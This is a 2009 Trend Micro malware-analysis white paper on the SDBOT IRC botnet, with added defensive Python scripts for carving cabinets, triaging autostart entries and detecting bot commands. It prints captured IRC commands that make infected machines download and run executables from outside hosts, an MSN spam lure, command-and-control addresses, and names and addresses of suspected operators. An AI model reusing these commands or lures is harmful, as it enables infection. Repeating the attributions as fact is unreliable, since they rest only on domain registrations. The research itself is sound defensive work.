SDBOT IRC Botnet Continues To Make Waves
Trend Micro threat researchers analyze the routines and social engineering techniques used by the SDBOT family of malware.

SDBOT IRC Botnet Continues To Make Waves Document Transcript

SDBOT IRC Botnet Continues to Make Waves
Trend Micro, Incorporated
Loucif Kharouni, Trend Micro Threat Research
A Trend Micro White Paper | December 2009
CONTENTS

Overview
BKDR_SDBOT.COD Analysis
  Stage 1: Initial Installer
    TROJ_DROPPR.BH Details
    BKDR_SDBOT.COD Details
  Stage 2: IRC Communication
  Stage 3: Third-Party Malware
    TROJ_CUTWAIL (PUSHDO/PANDEX)
    TROJ_FAKEAV
    WORM_KOOBFACE
Social Engineering
  Spam Wave 1: Self-Promotion Spam
  Spam Wave 2: Prestige Replica Spam
  Spam Wave 3: Other Social Engineering Spam
Behind the Malware: Botnet Owners
SDBOT, the Pay-per-Install Model, and FAKEAV
Best Practices to Avoid SDBOT Malware Infection
Conclusion
References

WHITE PAPER | SDBOT IRC BOTNET CONTINUES TO MAKE WAVES
OVERVIEW

SDBOT malware variants usually propagate through network shares and by exploiting unpatched vulnerabilities. They also exhibit a number of backdoor capabilities and some information-theft routines. Some variants even have the capability to bypass security measures and to overwrite system files in order to maximize their network connection capacity.

SDBOT malware have been around since at least 2004. Most of the bots that use Internet Relay Chat (IRC) protocol communication, such as AGOBOT, IRCBOT, RBOT, and others, have been around since at least 2001. However, these kinds of malware rarely attract attention because they operate silently. These bots are neither heavy email spammers nor resource hogs. They hardly ever disrupt normal computer activities (say, Internet browsing), so their victims never notice that their computers have been infected.

In this paper, the researcher focused on SDBOT variants and their final payload: the installation of pay-per-install programs.

The contents of this paper are targeted at security analysts and specialists. It includes an in-depth technical analysis of the SDBOT threat and takes a look behind the scenes at the business model used by the cybercriminal gang to rent out SDBOT's reach and download capability.
BKDR_SDBOT.COD ANALYSIS

Stage 1: Initial Installer

BKDR_SDBOT.COD is typically dropped by a Trojan detected by Trend Micro as TROJ_DROPPR.BH. The dropper arrives as a file named photo.com that is actually a simple Win32 Cabinet Self-Extractor renamed to a .COM extension. The extension makes no difference to Windows, which runs the file according to its PE content whatever the name; the rename only disguises it from casual inspection. If the file is renamed back to an executable (by changing the file name extension to .EXE), the embedded file named burim.exe can be extracted from it.

TROJ_DROPPR.BH Details

Filename: photo.com
MD5: 613ceb085ee2ad31e1f95249d804409e
SHA-1: b73ae87c167c8ec0e9e52000d7d3d8e9ecaba27a

Here are some snippets from the Trojan's code. The Microsoft Cabinet (.CAB) file header was found at the byte sequence 4D534346, which is the ASCII signature "MSCF" (see Figure 1).

Figure 1. MSCF header [4D534346]

To extract the contents of the Cabinet file, the bytes starting at the MSCF signature were selected and saved as burim.cab (see Figure 2).

Figure 2. Extracting burim.cab from photo.com
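The extraction step described above (select the bytes starting at the MSCF signature and save them as a .cab file) can be automated. The following Python script is an added example and not code from the Trend Micro paper: it locates CFHEADER candidates in a blob, validates them with the header's own version and size fields instead of taking everything to end of file, and carves the archive. The blob it runs on is constructed inside the script (a fake stub, a decoy "MSCF" string and a minimal cabinet header) and is not the real photo.com; the decoy shows why matching the signature alone is not enough.

```python
"""Carve Microsoft Cabinet (MSCF) archives out of an arbitrary byte blob.

Added example, not code from the Trend Micro paper. It automates the manual
step the paper describes for photo.com: locate the MSCF signature and save
everything from there as burim.cab. Instead of taking "everything to end of
file", it reads the cabinet's own cbCabinet length field, so it carves exactly
one archive and rejects stray "MSCF" byte sequences that are not a CFHEADER.
"""
import struct

# CFHEADER layout (little-endian, 36 bytes), per the Microsoft Cabinet format:
#   4s signature "MSCF" | I reserved1 | I cbCabinet (total size) | I reserved2
#   I coffFiles (offset of first CFFILE) | I reserved3 | B versionMinor
#   B versionMajor | H cFolders | H cFiles | H flags | H setID | H iCabinet
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")
MSCF = b"MSCF"


def find_cabinets(blob: bytes):
    """Return (offset, size, file_count) for every plausible CFHEADER in blob."""
    found = []
    pos = blob.find(MSCF)
    while pos != -1:
        if pos + CFHEADER.size <= len(blob):
            (_sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
             c_folders, c_files, _flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(blob, pos)
            # Sanity checks: the current CAB version is 1.3, the declared size must
            # fit inside the blob, and the CFFILE table must lie after the header.
            if ((ver_major, ver_minor) == (1, 3)
                    and CFHEADER.size <= cb_cabinet <= len(blob) - pos
                    and CFHEADER.size <= coff_files < cb_cabinet
                    and c_folders >= 1):
                found.append((pos, cb_cabinet, c_files))
        pos = blob.find(MSCF, pos + 1)
    return found


def carve_cabinets(blob: bytes):
    """Slice out each cabinet found by find_cabinets(); returns a list of bytes."""
    return [blob[off:off + size] for off, size, _ in find_cabinets(blob)]


def build_sample() -> bytes:
    """Constructed stand-in for photo.com: a fake PE-like stub, a decoy "MSCF"
    string that is NOT a real header, then a minimal valid CFHEADER followed by
    dummy folder/file bytes. Purely synthetic, not the real dropper."""
    stub = b"MZ" + b"\x90" * 300 + b"MSCF is not a cab here" + b"\x00" * 64
    payload = b"\x00" * 8 + b"burim.exe\x00" + b"\xAA" * 40  # fake CFFOLDER/CFFILE area
    cb_cabinet = CFHEADER.size + len(payload)
    header = CFHEADER.pack(MSCF, 0, cb_cabinet, 0, CFHEADER.size + 8, 0,
                           3, 1, 1, 1, 0, 0x1234, 0)
    return stub + header + payload + b"\x00" * 16  # trailing overlay bytes


if __name__ == "__main__":
    sample = build_sample()
    for off, size, nfiles in find_cabinets(sample):
        print(f"CFHEADER at offset {off:#x}, {size} bytes, {nfiles} file(s)")
    cab = carve_cabinets(sample)[0]
    with open("carved.cab", "wb") as fh:
        fh.write(cab)
    # Unpack the carved archive with: cabextract carved.cab
    # (or on Windows: expand carved.cab -F:* .)
```

On the real sample the carved file is burim.cab and unpacking it yields burim.exe. A cabinet whose cbCabinet field runs past the end of the input is truncated or deliberately malformed; this carver simply does not report it, which is the conservative choice when the output is going to be fed to an extractor.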
Figure 3. burim.exe extracted from burim.cab

The dropper (photo.com) performs some system changes. It creates the following registry entry:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP"

This entry is the standard clean-up that an IExpress (Cabinet self-extractor) package registers: DelNodeRunDLL32 in advpack.dll deletes the temporary extraction folder at the next logon. The IXP000.TMP folder and this RunOnce value therefore identify the packaging rather than SDBOT itself, but they are a reliable sign that such a self-extractor ran.

It also creates the following folder and files:

• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
• C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\burim.exe

The dropped file burim.exe is a backdoor.

BKDR_SDBOT.COD Details

Filename: burim.exe; fxstaller.exe
MD5: 2515df8f2df211e969da5d15d995da0e
SHA-1: a4f832556e9d4e8803b74ff40d7c0fd5b1fa8609

To infect systems, BKDR_SDBOT.COD places a copy of itself in the C:\Windows folder as fxstaller.exe and creates the following registry entry to ensure its automatic execution at every system startup:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows UDP Control Center = fxstaller.exe

Note that the value holds a bare file name with no path. Windows resolves it through its standard executable search order, which includes the Windows directory, and that is why the copy is placed in C:\Windows.

Upon execution, BKDR_SDBOT.COD connects to the following IRC server:

dddd.burimche.net -> 89.255.10.90

IP Address: 89.255.10.90
Host: unassigned-89-255-10-90.rdns.hosting-concepts.nl
Location: NL, Netherlands
City: Rotterdam, 11
Organization: Netnation Europe V.O.F.
ISP: Netnation Europe V.O.F.
AS Number: AS15703 TrueServer BV
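The persistence pattern described above (a bare fxstaller.exe value under the Run key, the copy in C:\Windows, and the IExpress clean-up entry under RunOnce) can be turned into a triage check for autostart entries. The following Python is an added example, not Trend Micro's code: it applies three rules to Run/RunOnce entries and reports why each suspicious one was flagged. The sample entries are constructed for the example (the value name wextract_cleanup0 is assumed here to be the name the IExpress stub uses for its clean-up entry, and the two benign entries are stand-ins); the collect_run_entries() helper reads the real keys but only on Windows.

```python
"""Triage Run/RunOnce autostart entries for the persistence pattern in the paper.

Added example, not code from the Trend Micro paper. BKDR_SDBOT.COD registers the
bare value "fxstaller.exe" under the HKLM Run key and drops the file in the
Windows directory, and the dropper leaves an IExpress clean-up entry
(advpack.dll,DelNodeRunDLL32 on an IXP000.TMP folder) under RunOnce. The rules
below encode those traits. The sample entries are constructed, and the
live-collection helper is only used on Windows.
"""
import re
import sys
from typing import Dict, List, Tuple

RUN_KEYS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
]

# Constructed sample of (key, value name, data) tuples: two SDBOT-style entries
# taken from the paper plus two ordinary-looking ones that must not be flagged.
# "wextract_cleanup0" is assumed to be the IExpress clean-up value name.
SAMPLE_ENTRIES = [
    (RUN_KEYS[0], "Windows UDP Control Center", "fxstaller.exe"),
    (RUN_KEYS[1], "wextract_cleanup0",
     r'rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP"'),
    (RUN_KEYS[0], "SecurityHealth", r'"C:\Program Files\Windows Defender\MSASCuiL.exe"'),
    (RUN_KEYS[0], "ctfmon", r"C:\WINDOWS\system32\ctfmon.exe"),
]

IEXPRESS_CLEANUP = re.compile(r'advpack\.dll,\s*DelNodeRunDLL32\s+"?(?P<dir>[^"]*IXP\d{3}\.TMP)', re.I)


def image_path(data: str) -> str:
    """First token of the command line, with surrounding quotes removed."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    return data.split(" ", 1)[0]


def triage_entry(key: str, name: str, data: str) -> List[str]:
    """Return the reasons an autostart entry looks like the SDBOT pattern (empty if none)."""
    reasons = []
    image = image_path(data)
    low = image.lower()
    m = IEXPRESS_CLEANUP.search(data)
    if m:
        reasons.append("IExpress self-extractor cleanup of %s (a Cabinet SFX ran here)" % m.group("dir"))
    elif "\\" not in image and "/" not in image:
        # A bare file name is resolved through the loader's search path, which
        # includes the Windows directory; that is why the bot copies itself there.
        reasons.append("bare image name %r resolved via search path" % image)
    elif re.fullmatch(r"[a-z]:\\windows\\[^\\]+\.exe", low):
        # Legitimate autostarts almost never live directly in the Windows root.
        reasons.append("image %s sits directly in the Windows directory" % image)
    if low.endswith("fxstaller.exe") or "udp control center" in name.lower():
        reasons.append("matches the BKDR_SDBOT.COD file/value name from the paper")
    return reasons


def triage(entries) -> Dict[Tuple[str, str], List[str]]:
    """Map (key, value name) -> reasons for every entry that triggers a rule."""
    hits = {}
    for key, name, data in entries:
        reasons = triage_entry(key, name, data)
        if reasons:
            hits[(key, name)] = reasons
    return hits


def collect_run_entries():
    """Read the real HKLM Run/RunOnce keys; Windows only (uses the winreg module)."""
    import winreg  # imported lazily so the triage logic itself runs anywhere
    out = []
    for key in RUN_KEYS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as h:
                i = 0
                while True:
                    try:
                        name, data, _typ = winreg.EnumValue(h, i)
                    except OSError:
                        break
                    out.append((key, name, str(data)))
                    i += 1
        except OSError:
            pass
    return out


if __name__ == "__main__":
    entries = collect_run_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for (key, name), reasons in triage(entries).items():
        print(key + "\\" + name + ": " + "; ".join(reasons))
```

The mutex LiNbagGgsag is not visible in the registry; on a live host it can be checked with a handle-enumeration tool such as Sysinternals Handle, or observed in a sandbox run.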
The IRC server's IP address (89.255.10.90) may vary. During testing, it changed every now and then to any of the following:

• 69.175.13.42
• 174.133.29.34
• 218.61.22.10

The bot then joins the IRC channel ##bb##. It also creates the mutex LiNbagGgsag to ensure that only one instance of itself is running in memory.

Stage 2: IRC Communication

Once back-and-forth communication has been established, the victim's computer effectively becomes a zombie. It can now be controlled by remote users, the creators of SDBOT, via IRC. As shown in the IRC traffic in Figure 4, which is sent to a zombie machine, commands are sent to the victim's computer to download third-party malware. This is part of the pay-per-install business.

Figure 4. IRC screen communication instructing the victim's computer to download files

:Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\tpde.exe 1

The machine then downloads the file a.exe from stashbox.org, saves it on the system's C: drive as tpde.exe, and runs it. Because the command is set as the channel TOPIC, the server also hands it to every bot that joins later, so bots that were offline when it was issued still receive and execute it.

:Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\tafe.exe 1
In the screenshot below (see Figure 5), the malware attempts to propagate via MSN, a popular instant messaging (IM) application.

Figure 5. Malware attempts to propagate via MSN

The bot master, the remote user who currently controls the network of compromised machines, sends commands via IRC carrying the link to spam to all MSN Messenger contacts found on the infected machine, using the following strings:

:get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg Hey, is this really you ?! : ) hxxp://www.main-gallery.com/image.php?=[msn email add of zombie machine]

Here 332 is the IRC RPL_TOPIC numeric, the reply that delivers a channel's topic to a client when it joins: the spam command is kept as the standing topic of #!msn1!, so each bot picks it up on arrival. The bot's nick, [NM00|FRA|79016], appears to carry a country tag (FRA), which would let the operators direct country-specific work such as the pay-per-install orders priced by country later in this paper.

The message strings above are then sent to all of the victim's MSN Messenger contacts. A contact who receives the message will likely assume that it came from someone he or she trusts. If he or she clicks the link in the message, he or she will be prompted to download and execute a file (i.e., the SDBOT malware).

Stage 3: Third-Party Malware

The victim's computer downloads any of several possible non-SDBOT malware listed below. Note, however, that this is not an exhaustive list.

• BKDR_POISON
• TROJ_BUZUS
• TROJ_CUTWAIL
• TROJ_FAKEAV
• TROJ_RENOS
• TROJ_SMALL
• TROJ_VUNDO
• WORM_AUTORUN
• WORM_KOOBFACE
• WORM_MAINBOT
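The two command shapes captured above, the .p.karikar download-and-run instruction from Stage 2 and the !msn.msg spam instruction delivered as a channel topic in this section, are simple enough to detect in IRC traffic. The following Python is an added example and not code from the paper: a minimal IRC line parser plus two detectors, run over constructed sample lines modelled on Figures 4 and 5 (the victim e-mail address in the MSN link is a placeholder). That the trailing 1 is a run flag is inferred from the paper's description of the behaviour, not stated by it, and is marked as an assumption in the code.

```python
"""Detect SDBOT-style download-and-execute and MSN-spam commands in IRC traffic.

Added example, not code from the Trend Micro paper. The two command shapes come
from the paper's captures: ".p.karikar <url> <local path> <flag>" carried in a
channel TOPIC or PRIVMSG, and "!msn.msg <text> <url>" carried in a topic (the
332 numeric is RPL_TOPIC, the topic a client receives on join). Field meanings
beyond what the paper states, for example that the trailing "1" is a run flag,
are assumptions and are labelled as such below.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample lines modelled on the paper's Figures 4 and 5 (not a real log).
SAMPLE_LINES = [
    ":Bul-rdp!Bur-rdp@bur.gov TOPIC ##bb## :.p.karikar http://stashbox.org/543111/a.exe c:\\tpde.exe 1",
    ":Bul-rdp!Bur-rdp@bur.gov PRIVMSG ##bb## :.p.karikar http://www.iliridas.com/girl.exe c:\\tafe.exe 1",
    ":get.lost 332 [NM00|FRA|79016] #!msn1! : !msn.stop| !msn.msg Hey, is this really you ?! : ) "
    "hxxp://www.main-gallery.com/image.php?=victim@example.com",   # placeholder address
    ":someone!user@host PRIVMSG #chat :hello, is anyone here?",    # benign noise
    "PING :irc.example.net",                                       # no prefix at all
]


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str] = field(default_factory=list)
    trailing: Optional[str] = None


def parse_irc_line(line: str) -> IrcMessage:
    """Split an RFC 1459 line into prefix, command, middle params and trailing param."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else None)


# ".p.karikar <url> <local path> <flag>"; ASSUMPTION: flag "1" means run after download
DOWNLOAD_RE = re.compile(r"^\.p\.karikar\s+(?P<url>\S+)\s+(?P<path>\S+)(?:\s+(?P<flag>\d))?", re.I)
# "!msn.msg <bait text> <url>": the URL is the last token; hxxp is a defanged http
MSN_RE = re.compile(r"!msn\.msg\s+(?P<text>.*?)\s*(?P<url>h(?:xx|tt)ps?://\S+)$", re.I)


@dataclass
class Indicator:
    kind: str          # "download_exec" or "msn_spam"
    channel: str
    url: str
    detail: str        # drop path (plus run flag note), or bait text
    via: str           # TOPIC, PRIVMSG or 332 (RPL_TOPIC)


def extract_indicators(lines) -> List[Indicator]:
    """Run the two command detectors over IRC lines and return what they matched."""
    found = []
    for raw in lines:
        msg = parse_irc_line(raw.rstrip("\r\n"))
        if msg.trailing is None or msg.command not in ("TOPIC", "PRIVMSG", "332"):
            continue
        # For 332 the params are <nick> <channel>; for TOPIC/PRIVMSG just <channel>
        channel = msg.params[-1] if msg.params else ""
        m = DOWNLOAD_RE.search(msg.trailing)
        if m:
            run = " (run after download, flag=1; assumed meaning)" if m.group("flag") == "1" else ""
            found.append(Indicator("download_exec", channel, m.group("url"),
                                   m.group("path") + run, msg.command))
            continue
        m = MSN_RE.search(msg.trailing)
        if m:
            found.append(Indicator("msn_spam", channel, m.group("url"),
                                   m.group("text").strip(), msg.command))
    return found


if __name__ == "__main__":
    for ind in extract_indicators(SAMPLE_LINES):
        print(f"{ind.kind:14} via {ind.via:8} {ind.channel:10} {ind.url}  [{ind.detail}]")
```

Fed with lines from a network capture or an IRC honeyclient log, the same two detectors yield the download URLs and drop paths to block and the spam links to add to IM filtering; matching on the 332 numeric as well as TOPIC is what catches commands that were issued before the capture started.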
Some of the malware listed are among the more dangerous ones researchers have seen recently. The following sections provide short profiles of some of these malware, whose routines make vivid how dangerous it is to be part of an IRC botnet nowadays.

TROJ_CUTWAIL (PUSHDO/PANDEX)

If a machine is infected by TROJ_CUTWAIL, it is almost certainly part of a botnet called "CUTWAIL" (also known as "PUSHDO" or "PANDEX"). This botnet is one of the largest spam botnets in the world. It has been responsible for several known spam campaigns that advertise pharmaceutical products (e.g., Viagra) or pharmaceutical companies (e.g., Canadian Pharmacy). This botnet is also responsible for malware-related spam campaigns, specifically the recent U.S. Independence Day spam, which contained malicious links that, when clicked, led recipients to a website to download a WORM_WALEDAC variant. Researchers have also seen this botnet send out ecard spam in July. These email messages bore the same email body even though the attached file ecard.exe could be either a TROJ_CUTWAIL or a TROJ_ZBOT variant.

TROJ_FAKEAV

Most security- and tech-savvy users are already familiar with rogue antivirus (FAKEAV) malware. These programs claim to rid a system of infections that the rogue program itself planted. In recent months, FAKEAV variants arrived as the final payload of blackhat search engine optimization (SEO) attacks. However, FAKEAV can also be one link in other malware infection chains, as it is here.

WORM_KOOBFACE

KOOBFACE is well known for spreading via social networking websites such as Facebook, Friendster, Twitter, and others.
Users may receive spammed messages in their Facebook inboxes containing links to a particular video. These links, however, lead to the download of a KOOBFACE variant instead. KOOBFACE is one of the biggest Web 2.0 botnets spreading on Facebook, MySpace, and Twitter.
SOCIAL ENGINEERING

SDBOT uses various social engineering techniques to lure victims, the most common of which is running spam waves: self-promotion spam, prestige replica spam, and other social engineering spam.

Spam Wave 1: Self-Promotion Spam

Self-promotion spam waves send malicious links to personal profile pages or files with a short message in order to convince users to click the link and thereby download a malicious file, which connects them to the botnet (see Figure 6).

Figure 6. Self-promotion spam

Spam Wave 2: Prestige Replica Spam

Prestige replica spam waves send links to replica sites with a short message in order to convince users to click the link and buy replica watches (see Figure 7).

Figure 7. Prestige replica spam
Spam Wave 3: Other Social Engineering Spam

Most of the social engineering spam waves send malicious links to sites hosting news on popular events (e.g., Michael Jackson's death) with a short message in order to convince users to click the link and thereby download a malicious file, which connects them to the botnet (see Figure 8).

Figure 8. Other social engineering spam
BEHIND THE MALWARE: BOTNET OWNERS

As part of this study, the researcher looked at everything related to the burimche.net domain, including the following:

• *.burimilol.com
• *.burimilol.net
• *.burimche.net
• burimi.*.net

While looking for information about these domain names, the researcher came across a forum where two members were talking about an executable file for sale. One of them was complaining that the user burimi @ nerashti.com had not created the file as promised after he had already paid for the service.

Continuing the investigation of domain names, the researcher also looked for the newest related domain names but found that they had all been registered through either Yahoo! or Altavista. The manner in which the cybercriminals register domain names has changed, making it harder for researchers to track them back. So the researcher decided to look instead at the oldest domain name, burimilol.net, and found the following:

[BURIMILOL.NET]
BURIM ALIJI
NERASHTI 1203
TETOVO, 91200
MACEDONIA ALBANIA

[MAINMSN.COM]
nicKy, FisniK
NERASHTI
TETOVO, 20000
source://myspc.net/wievimage.php

Registrant MYSPC.NET:
Bruno (edinplay@gmail.com)
fajro 14
Ulqin* - Laç 40000
ALGERIA

*Ulqin is located in Montenegro, not in Algeria.

Burim in Albanian means "source." These findings suggest that these threats could originate from Albania, Macedonia, or Montenegro.
As stated earlier, it has become hard to track the cybercriminals based on domain names, as for some reason they have resorted to using free Internet services from providers such as Yahoo! or Altavista. The cybercriminals continuously changed IP addresses as well, making the task even harder. For instance, tracking a single domain name can lead to several different IP addresses. In a month, a domain name can have around four different IP addresses (see Figure 9).

Figure 9. IP addresses a single domain name can connect to

The botnet sends links to several domain names via MSN (see Figure 10).
Figure 10. Links sent via MSN

Given the nature of SDBOT, which is primarily geared toward downloading other malware files that each have their own distinct payloads and strong connections with other malware families, it appears that the botnet is in the business of renting out its reach and download capability to cybercriminals. These cybercriminals may be interested either in increasing their number of victims or in sending out spammed messages for various other purposes. This is a known malware business model in which some cybercriminal gangs pay others to spread their malicious code. For the longest time, instead of conducting its own focused attacks, the SDBOT cybercriminal gang has kept itself busy responding to business requests such as installing FAKEAV, KOOBFACE, CUTWAIL, and other malware variants on its infected bots.

As security experts and threat researchers already know by now, botnets not only bring about big business; they are also, to a certain logical extent, interconnected with one another. Cybercriminals do business with other cybercriminals. This allows them to take advantage of other, possibly better, technologies and newer ways to spread their malicious code than when they do so on their own.
On top of being cybercriminals, they are first "real" criminals who conduct illegal business by stealing money and crucial/private information and ruining companies' businesses. Cybercriminal interconnections are becoming more common. Working together is no longer a problem among cybercriminals, as it was in the past. As such, they have become stronger and harder to track. It is easy to see that money is driving all these illegal activities. The only remaining question is, "Why use an 'old' technology such as an IRC botnet when lots of newer technologies can already be seen in the wild?"

The answer is quite simple: this kind of botnet is currently off the radar, unlike several others (DOWNAD, ZEUS, WALEDAC, KOOBFACE, ILOMO, and PUSHDO), which are consistently being monitored by researchers. Using a simple but effective type of botnet makes cybercriminals feel like they are in "heaven." They can opt to use not only one but several ways to spread malware.
SDBOT, THE PAY-PER-INSTALL MODEL, AND FAKEAV

FAKEAV variants are currently taking the threat landscape by storm. The use of the pay-per-install business model is also increasing because the model is easy to use. A botnet owner now gets paid to install malware on already-infected PCs. For instance, a FAKEAV creator pays the SDBOT gang, which already owns an IRC botnet and controls thousands of infected machines, to push the FAKEAV file to those systems. The gang is then paid a certain amount of money for each successful installation (see Table 1).

Country Code      Price
US                US$120
BR                US$60
TR                US$45
Mixed             US$25
GB, CA, DE        US$150

Table 1. Pay-per-install FAKEAV price list

The following country codes can be included in mixed lists:

A2, AE, AF, AM, AR, AT, AU, AZ, BD, BE, BG, BH, BR, BY, CA, CH, CI, CL, CN, CO, CZ, DE, DZ, EC, EG, ES, EU, FR, GB, GE, GH, GR, HK, HR, HU, ID, IL, IN, IQ, IR, IT, JO, JP, KG, KH, KR, KW, KZ, LK, LT, LV, LY, MA, MD, MK, MX, MY, NG, NI, NL, NP, NZ, OM, PA, PE, PH, PK, PL, PT, QA, RO, RS, RU, SA, SE, SG, SI, SK, SY, TH, TN, TR, TW, TZ, UA, US, UY, UZ, VN, YE, ZA

As shown, the prices paid depend on the target countries, mainly because the difficulty of compromising systems is taken into account. For instance, compromising a computer located in North America or Europe is harder because it is better protected, and hence costs more. However, because more people have Internet access in these countries, more systems can be compromised in them, which cybercriminals also take into consideration.

Pay-per-install services are publicly available on many Russian underground forums. Anyone can offer pay-per-install services for money. Target systems can be chosen in terms of:

• Region
• Country
• OS
• Language

Another way to make money in the pay-per-install business is to register on underground-affiliated websites (see Figure 11). Cybercriminals provide the malware sample to interested parties, who then make it available for victims to install. Once interested parties get the malware from an affiliate site, they bind it with a popular program and post it via torrents or peer-to-peer (P2P) networks. Binding is a popular technique used to merge two files into one. For example, any Trojan can be merged with Adobe Acrobat Writer, which can then be made available for download via torrents. Unknowing users then get a free Trojan along with their Adobe Acrobat Writer. Binder tools are available all over the Web and are not too hard to find.
BEST PRACTICES TO AVOID SDBOT MALWARE INFECTION

In the course of conducting research on SDBOT variants, the researcher came across some useful dos and don'ts that users can employ to avoid SDBOT malware infection:

• Do not click links sent via IM applications, especially if you do not know who sent them.
• Do update your security applications regularly to decrease the chances of becoming infected.
• Do not open unsolicited email or spam.

Since SDBOT variants also spread through network shares and unpatched vulnerabilities (see the Overview), keeping systems patched and restricting writable network shares closes the other entry points. For responders, the analysis above also yields concrete indicators to check for: the file C:\Windows\fxstaller.exe, the Run value "Windows UDP Control Center", the mutex LiNbagGgsag, an IXP000.TMP folder under the user's temporary directory, and outbound IRC connections to dddd.burimche.net (whose IP address changes) that join the channel ##bb##.
CONCLUSION

In this paper, we saw how this threat connects a user's system to an IRC network. We also saw how the botnet uses an infected system to spread other malware, which may connect it to another botnet. We observed how cybercriminals go about their business and how their networks are structured.

As such, we recommend the use of free tools such as RUBotted (see Figures 12 and 13) to detect whether a computer is part of an IRC botnet and HouseCall (see Figure 14) to clean an infected system. RUBotted monitors computers for suspicious activities and regularly checks with an online service to identify behaviors associated with bots.

Figure 12. RUBotted GUI

Figure 13. RUBotted message prompt

Figure 14. HouseCall GUI

HouseCall 7, Trend Micro's latest free online scanner, leverages the Smart Protection Network to deliver fast detection and removal of active malware. It zeroes in on active threats by checking key system areas used by malware programs. It also checks for malicious browser plug-ins, rootkits, and other auto-run executable files. Its new features include:

• A browser-independent client that eliminates compatibility issues often associated with other browser-activated scanners
• Smart Scan technology for targeted scanning of active malware, reducing scan time to several minutes
• In-the-cloud threat intelligence, delivering immediate detection while reducing download requirements
• Smart feedback that shares threat information with the Smart Protection Network, enabling data correlation across a global intelligence network to quickly discover new threats
• Review and restore functionality that lets a user compare current with past scan results and recover files

HouseCall is Trend Micro's highly popular and capable on-demand scanner for identifying and removing viruses, Trojans, worms, unwanted browser plug-ins, and other malware.
REFERENCES

• Trend Micro. (2009). Threat Encyclopedia. "BKDR_SDBOT.COD." http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.COD (Retrieved August 2009).
• Trend Micro. (2009). Threat Encyclopedia. "TROJ_DROPPR.BH." http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPR.BH (Retrieved August 2009).

©2009 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.